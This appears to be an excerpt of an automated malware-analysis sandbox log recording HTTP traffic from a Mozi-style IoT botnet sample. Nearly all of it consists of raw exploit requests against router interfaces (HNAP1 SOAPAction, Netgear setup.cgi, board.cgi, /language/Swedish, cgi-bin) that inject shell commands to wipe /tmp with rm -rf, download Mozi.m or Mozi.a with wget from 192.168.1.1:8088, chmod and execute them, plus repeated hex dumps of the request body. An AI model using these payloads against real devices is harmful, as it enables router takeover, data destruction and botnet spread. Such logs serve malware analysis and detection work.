xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.72.158.238:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.101.170.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 168.176.61.231:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 2.178.219.63:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.4.18.169:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 54.84.181.34:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope 
